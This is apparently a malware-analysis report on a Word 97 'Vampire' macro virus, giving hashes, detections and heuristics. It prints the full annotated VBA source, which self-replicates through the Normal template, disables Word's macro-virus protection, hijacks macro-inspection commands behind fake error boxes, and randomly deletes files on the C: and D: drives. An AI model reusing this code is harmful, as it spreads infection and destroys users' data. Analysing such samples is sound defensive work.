Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f327708031e0aaef…

MALICIOUS

Office (OLE)

42.5 KB Created: 1998-03-16 03:04:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b3d0527632648f9f0133c72b78209f8c SHA-1: 8f1fbd2b6349fa76e401c934f39b053d97322752 SHA-256: f327708031e0aaef34e412c86fec5d74916c9ff881ea42dc7622fb5274d622c5
256 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains legacy WordBasic macro markers and VBA macros, including AutoOpen, AutoClose and AutoExec procedures that Word runs automatically on document open, document close and application start, so the code executes on ordinary document interaction. ClamAV detections for 'Doc.Trojan.Beauty-1' and 'Doc.Trojan.Vampire-7' further confirm its malicious nature. The VBA script copies itself between the Normal template and the active document (Application.OrganizerCopy) and disables Word's macro-virus warning (Options.VirusProtection = False), for persistence and to spread to other documents. The extracted source also carries a destructive payload that the heuristics above do not flag separately: the KI, KI1, KI2 and KI3 routines delete files from the top-level directories of the C: and D: drives, triggered at random from the auto macros and from macros named after the Word commands a user would reach for to inspect or remove macros (ToolsMacro, ToolsOptions, ToolsCustomize, ViewVBcode, FileTemplates), each of which then shows a fake "Out of Memory" error.

Heuristics 6

  • ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Beauty-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub autoclose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7860 bytes
SHA-256: 285e57a3c4d6e996939b7112aef48a239c02a65c9207403bbee3cae9c2c3889c
Detection
ClamAV: Doc.Trojan.Vampire-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
' Module attributes of the document's own ThisDocument class module, as exported by olevba.
' VB_Base is the Word.Document class id and VB_PredeclaredId/VB_Exposed are the usual values
' for ThisDocument. The extract shows no procedures in this module; all code is in "Vampire".
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Second exported module, named "Vampire". Every procedure below lives here, and "Vampire" is
' the VBComponents name that autoopen/autoclose search for to decide whether a document or
' the Normal template is already infected.
Attribute VB_Name = "Vampire"
' Analyst note: runs automatically when the document is closed (Word auto macro AutoClose,
' flagged as OLE_VBA_AUTOCLOSE). Same replication body as autoopen, followed by a 1-in-20
' roll that launches the file-deletion routines KI and KI2. "On Error Resume Next" hides every
' failure, so nothing is reported to the user when a step is blocked.
Sub autoclose()
Attribute autoclose.VB_Description = "巨集建立於 98/03/15,建立者 AAAA"
Attribute autoclose.VB_ProcData.VB_Invoke_Func = "Normal.Vampire.autoclose"
' VB_Description above reads, translated: "macro created on 98/03/15, creator AAAA".
' VB_Invoke_Func places the module in the Normal template ("Normal.Vampire").
Dim CV
On Error Resume Next
    ' Disables Word's macro-virus warning (the line matched by OLE_VBA_MACRO_VIRUS_REPLICATION).
    Options.VirusProtection = False
    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate
    DocumentInstalled = False
    GlobalInstalled = False

    ' Infection check 1: is a VBA component named "Vampire" already in the open document?
    ' NOTE(review): reading VBProject needs "Trust access to the VBA project object model";
    ' on modern Office that is off by default, so this and the copies below should fail there —
    ' confirm in a sandbox before assuming replication succeeds.
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Vampire" Then
            DocumentInstalled = True
        End If
    Next

    ' Infection check 2: the same test against the global Normal template.
    For j = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(j).Name = "Vampire" Then
            GlobalInstalled = True
        End If
    Next

    ' Normal -> document: copies the "Vampire" project item with OrganizerCopy, re-saves the
    ' document in template format and suppresses the properties prompt so the write is silent.
    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs , FileFormat:=wdFormatTemplate
        Options.SavePropertiesPrompt = False
    End If

    ' Document -> Normal: the reverse copy, with the "save changes to Normal?" prompt suppressed.
    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
End If

' Payload trigger: CV is a random integer 1..20; only the value 13 runs the C: (KI) and
' D: (KI2) deletion routines, so the destructive behaviour is intermittent.
CV = WordBasic.Int(Rnd() * 20) + 1
If CV = 13 Then
WordBasic.call "KI"
WordBasic.call "KI2"
End If
' Label is never the target of a GoTo in this procedure.
exit_:

End Sub
' Analyst note: AutoExec runs when Word starts, once the module has been copied into the
' Normal template. CT is a random integer 1..30, so four of the five listed values can match
' (31 is never produced) — roughly a 4-in-30 chance per Word start of running the repeated
' C: and D: deletion routines KI1/KI3 and then the "Vampire" dialog routine.
Sub autoexec()
Dim CT
On Error Resume Next
CT = WordBasic.Int(Rnd() * 30) + 1
If CT = 11 Or CT = 15 Or CT = 21 Or CT = 25 Or CT = 31 Then
WordBasic.call "KI1"
WordBasic.call "KI3"
WordBasic.call "Vampire"
End If

End Sub
' Analyst note: runs automatically when the document is opened (Word auto macro AutoOpen,
' flagged as OLE_VBA_AUTOOPEN). Identical to the replication part of autoclose: disable the
' macro-virus warning, test both the document and the Normal template for a "Vampire"
' component, and copy the project item in whichever direction is missing. No random
' payload trigger in this variant.
Sub autoopen()
On Error Resume Next
   
    ' Disables Word's macro-virus warning before touching the VBA project.
    Options.VirusProtection = False
    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate
    DocumentInstalled = False
    GlobalInstalled = False

    ' Infection check against the open document (requires VBA project object model access;
    ' NOTE(review): blocked by default on modern Office — confirm in a sandbox).
    For i = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(i).Name = "Vampire" Then
            DocumentInstalled = True
        End If
    Next

    ' Infection check against the global Normal template.
    For j = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(j).Name = "Vampire" Then
            GlobalInstalled = True
        End If
    Next

    ' Normal -> document: OrganizerCopy of the "Vampire" item, silent re-save as a template.
    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs , FileFormat:=wdFormatTemplate
        Options.SavePropertiesPrompt = False
    End If

    ' Document -> Normal: reverse copy with the Normal-save prompt suppressed (persistence).
    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Vampire", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
End If

' Unused label.
exit_:
End Sub
' Analyst note: the "announcement" routine, reached from autoexec. Calls INSF to write the
' virus banner into the document, then shows a WordBasic dialog titled "**** Bingo ****"
' with the texts "Word97 Macro Virus" / "----Vampire----" and a single OK button. Finally
' it schedules a procedure named "Vampire97" via WordBasic.OnTime for what looks like the
' current hour and minute+1 — that procedure is NOT present in this extract, so the timer
' call should fail silently under "On Error Resume Next".
Sub Vampire()
Dim push1
Dim Ka$
Dim Kb$
Dim Kb_
On Error Resume Next
INSF
' Dialog definition: a 180x78 WordBasic user dialog with two text labels and an OK button.
WordBasic.BeginDialog 180, 78, "     **** Bingo ****"
    WordBasic.Text 9, 9, 160, 13, " Word97 Macro Virus", "Text1"
    WordBasic.Text 27, 28, 122, 13, " ----Vampire----", "Text2"
    WordBasic.PushButton 43, 48, 88, 21, "OK", "push1"
WordBasic.EndDialog

' Shows the dialog; the 10000 argument is presumably a timeout so the banner does not block forever — confirm.
Dim Vampire As Object: Set Vampire = WordBasic.CurValues.UserDialog
push1 = WordBasic.Dialog.UserDialog(Vampire, -1, 10000)
' Ka$/Kb$ take the first and last two characters of CTime$(7) — assumed hour and minute; verify.
Ka$ = WordBasic.[Left$](WordBasic.[CTime$](7), 2)
Kb$ = WordBasic.[Right$](WordBasic.[CTime$](7), 2)
Kb_ = WordBasic.Val(Kb$)
Kb_ = Kb_ + 1
Kb$ = Str(Kb_)
' Timer-based trigger for "Vampire97", which does not exist in the extracted source.
WordBasic.OnTime Ka$ + ":" + Kb$, "Vampire97"

exit_:

End Sub
' Analyst note: defacement helper called by Vampire. Inserts four copies of a tab-separated
' banner line "Word97 Macro Virus<TAB>Vampire<TAB>Vampire<TAB>Vampire" at the cursor, toggling
' bold/italic/underline on alternate fields, each followed by a paragraph break. The
' start:/exit_: labels and counter R form a manual loop that runs exactly four times
' (R goes 1..4, exits when R > 3).
' NOTE(review): WordBasic.DisableInput 1 appears to stop the user cancelling the macro with
' Esc — confirm against WordBasic documentation.
Private Sub INSF()
Dim R
Dim a$
Dim B$
Dim C$
Dim D$
WordBasic.DisableInput 1
On Error Resume Next
R = 0
start:
a$ = "Word97 Macro Virus"
B$ = "Vampire"
C$ = "Vampire"
D$ = "Vampire"
' Field 1 in bold/italic/underline, then plain, alternating; Chr(9) is a tab separator.
WordBasic.Bold 1: WordBasic.Italic 1: WordBasic.Underline 1
WordBasic.Insert a$ + Chr(9)
WordBasic.Bold 0: WordBasic.Italic 0: WordBasic.Underline 0
WordBasic.Insert B$ + Chr(9)
WordBasic.Bold 1: WordBasic.Italic 1: WordBasic.Underline 1
WordBasic.Insert C$ + Chr(9)
WordBasic.Bold 0: WordBasic.Italic 0: WordBasic.Underline 0
WordBasic.Insert D$
WordBasic.InsertPara
' Loop control: four iterations in total.
R = R + 1
If R > 3 Then GoTo exit_
GoTo start

exit_:

End Sub
' Analyst note: named after the Word built-in command File > Templates; a macro with a
' built-in command's name is run in place of that command, so the user can no longer reach
' the Templates dialog. With a random chance (today's day-of-month equals a fresh random
' 1..30, or today's weekday equals random W in 1..7) it runs the repeated C: deletion
' routine KI1. It always beeps and shows a fake "Out of Memory" box titled
' "Microsoft Visual Basic" (48 = exclamation icon), presumably so the blocked command looks
' like a crash rather than a hijack. Same body as ViewVBcode/ToolsMacro/ToolsCustomize/ToolsOptions.
Sub FileTemplates()
Dim W
WordBasic.DisableInput 1
On Error Resume Next
W = WordBasic.Int(Rnd() * 7) + 1
If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then
WordBasic.call "KI1"
End If
WordBasic.Beep
WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48
exit_:

End Sub
' Analyst note: hijacks the Word built-in command that opens the Visual Basic editor
' (ViewVBCode), the obvious route for a user to inspect the macro. Body identical to
' FileTemplates: random-chance call of the C: deletion routine KI1, then a beep and a fake
' "Out of Memory" error box attributed to "Microsoft Visual Basic".
Sub ViewVBcode()
Dim W
WordBasic.DisableInput 1
On Error Resume Next
W = WordBasic.Int(Rnd() * 7) + 1
If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then
WordBasic.call "KI1"
End If
WordBasic.Beep
WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48
exit_:

End Sub
' Analyst note: hijacks Tools > Macro (the command used to list, run or delete macros); the
' name is one of the legacy markers behind OLE_LEGACY_WORDBASIC_MACRO_VIRUS. Body identical
' to FileTemplates: random-chance call of KI1, then beep and fake "Out of Memory" box.
Sub ToolsMacro()
Dim W
WordBasic.DisableInput 1
On Error Resume Next
W = WordBasic.Int(Rnd() * 7) + 1
If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then
WordBasic.call "KI1"
End If
WordBasic.Beep
WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48
exit_:

End Sub
' Analyst note: hijacks Tools > Customize. Body identical to FileTemplates: random-chance
' call of the C: deletion routine KI1, then beep and a fake "Out of Memory" error box.
Sub ToolsCustomize()
Dim W
WordBasic.DisableInput 1
On Error Resume Next
W = WordBasic.Int(Rnd() * 7) + 1
If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then
WordBasic.call "KI1"
End If
WordBasic.Beep
WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48
exit_:

End Sub
' Analyst note: hijacks Tools > Options, where the macro-virus protection setting that
' autoopen/autoclose switch off would normally be re-enabled. Body identical to
' FileTemplates: random-chance call of KI1, then beep and a fake "Out of Memory" error box.
Sub ToolsOptions()
Dim W
WordBasic.DisableInput 1
On Error Resume Next
W = WordBasic.Int(Rnd() * 7) + 1
If WordBasic.Day(WordBasic.Now()) = WordBasic.Int(Rnd() * 30) + 1 Or WordBasic.WeekDay(WordBasic.Now()) = W Then
WordBasic.call "KI1"
End If
WordBasic.Beep
WordBasic.MsgBox " Out of Memory", "Microsoft Visual Basic", 48
exit_:

End Sub
' Analyst note: destructive payload for drive C:, single pass. Enumerates the top-level
' directories of C:\ and, for each one, asks Files$ for a match on "<dir>\*.*" and passes
' the result to WordBasic.Kill. Errors (read-only or in-use files, missing drive) are
' swallowed by "On Error Resume Next". k$ is built but never used. Called from autoclose
' on a 1-in-20 roll.
' NOTE(review): WordBasic Files$ appears to return one matching file name per call, which
' would limit each pass to one file per directory — confirm before stating impact.
Sub KI()
Dim WC
Dim i
Dim k$
Dim KF$
pcscan:
On Error Resume Next
WC = WordBasic.CountDirectories("C:\")
For i = 1 To WC
k$ = "C:\" + WordBasic.[GetDirectory$]("C:\", i) + "\*.*"
KF$ = WordBasic.[Files$]("C:\" + WordBasic.[GetDirectory$]("C:\", i) + "\*.*")
If KF$ = "" Then GoTo TWO
WordBasic.Kill KF$

TWO:
Next i

exit_:

End Sub
' Analyst note: same C:\ deletion sweep as KI, but repeated: the R counter and the
' pcscana: label make the whole enumerate-and-Kill pass run eight times (R goes 1..8,
' repeating while R <= 7). Called from autoexec and from every hijacked Tools/View/File
' command macro, so this is the variant most likely to fire.
Sub KI1()
Dim R
Dim WC1
Dim i
Dim k$
Dim KF$
R = 0
pcscana:
On Error Resume Next

WC1 = WordBasic.CountDirectories("C:\")
For i = 1 To WC1
k$ = "C:\" + WordBasic.[GetDirectory$]("C:\", i) + "\*.*"
KF$ = WordBasic.[Files$]("C:\" + WordBasic.[GetDirectory$]("C:\", i) + "\*.*")
If KF$ = "" Then GoTo TWO
WordBasic.Kill KF$

TWO:
Next i

exit_:

' Pass counter: loops back to pcscana for a total of eight passes.
R = R + 1
If R <= 7 Then GoTo pcscana

End Sub
' Analyst note: single-pass sweep meant for drive D:. Directory names are enumerated from
' D:\, but the path handed to Files$ is prefixed with "C:\", so the file actually looked up
' (and Killed) is under C:\<D-directory-name>\ — the effective target differs from the
' drive being enumerated. Called from autoclose on the same 1-in-20 roll as KI.
Sub KI2()
Dim WC2
Dim i
Dim k$
Dim KF$
pcscanb:
On Error Resume Next
WC2 = WordBasic.CountDirectories("D:\")
For i = 1 To WC2
k$ = "D:\" + WordBasic.[GetDirectory$]("D:\", i) + "\*.*"
' Note the "C:\" prefix here versus the "D:\" enumeration above.
KF$ = WordBasic.[Files$]("C:\" + WordBasic.[GetDirectory$]("D:\", i) + "\*.*")
If KF$ = "" Then GoTo TWO
WordBasic.Kill KF$

TWO:
Next i

exit_:

End Sub
' Analyst note: repeated deletion sweep for drive D:, the D:\ counterpart of KI1 — eight
' passes over the top-level directories of D:\ (R goes 1..8, repeating while R <= 7), each
' Files$ match on "<dir>\*.*" passed to WordBasic.Kill. Unlike KI2 the drive letters are
' consistent. Called from autoexec together with KI1.
Sub KI3()
Dim R
Dim WC3
Dim i
Dim k$
Dim KF$
R = 0

pcscanc:
On Error Resume Next

WC3 = WordBasic.CountDirectories("D:\")
For i = 1 To WC3
k$ = "D:\" + WordBasic.[GetDirectory$]("D:\", i) + "\*.*"
KF$ = WordBasic.[Files$]("D:\" + WordBasic.[GetDirectory$]("D:\", i) + "\*.*")
If KF$ = "" Then GoTo TWO
WordBasic.Kill KF$

TWO:
Next i

exit_:

' Pass counter: loops back to pcscanc for a total of eight passes.
R = R + 1
If R <= 7 Then GoTo pcscanc

End Sub